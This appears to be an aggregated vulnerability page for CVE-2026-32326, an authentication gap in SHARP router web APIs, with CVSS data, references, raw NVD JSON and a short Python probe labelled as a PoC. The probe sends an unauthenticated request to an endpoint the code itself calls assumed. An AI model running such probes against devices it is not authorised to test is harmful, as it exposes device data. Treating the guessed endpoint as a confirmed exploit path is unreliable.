CVE-2026-32326

Description

SHARP routers do not perform authentication for some web APIs. The device information may be retrieved without authentication. If the administrative password of the device is left as the initial one, the device may be taken over.

CVSS Details

CVSS Score

5.7

Severity

MEDIUM

CVSS Vector

CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SHARP Routers (请参考官方2026-002公告获取具体型号)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_sharp_router_vuln(target_ip):
    # Target endpoint assumed based on vulnerability description
    # e.g., an API that returns device info without auth
    url = f"http://{target_ip}/api/v1/system_info" 
    
    try:
        # Send request without authentication headers
        response = requests.get(url, timeout=5)
        
        if response.status_code == 200:
            print(f"[+] Potential Vulnerability Detected at {target_ip}")
            print("[+] Response Data:")
            print(response.text)
            print("[!] Warning: If default password is used, device takeover is possible.")
        else:
            print(f"[-] Target {target_ip} does not seem vulnerable or endpoint changed.")
            
    except Exception as e:
        print(f"[-] Error connecting to {target_ip}: {e}")

if __name__ == "__main__":
    # Replace with the target router IP
    target = "192.168.1.1"
    check_sharp_router_vuln(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32326
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32326
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32326/
[4] VulDB https://vuldb.com/cve/CVE-2026-32326
[5] https://global.sharp/corporate/info/product-security/advisory-list/2026-002/
[6] https://jvn.jp/en/jp/JVN49524110/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32326", "sourceIdentifier": "[email protected]", "published": "2026-03-25T08:16:22.547", "lastModified": "2026-03-25T15:41:33.977", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "SHARP routers do not perform authentication for some web APIs. The device information may be retrieved without authentication. If the administrative password of the device is left as the initial one, the device may be taken over."}, {"lang": "es", "value": "Los routers SHARP no realizan autenticación para algunas API web. La información del dispositivo puede ser recuperada sin autenticación. Si la contraseña administrativa del dispositivo se deja como la inicial, el dispositivo puede ser tomado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://global.sharp/corporate/info/product-security/advisory-list/2026-002/", "source": "[email protected]"}, {"url": "https://jvn.jp/en/jp/JVN49524110/", "source": "[email protected]"}]}}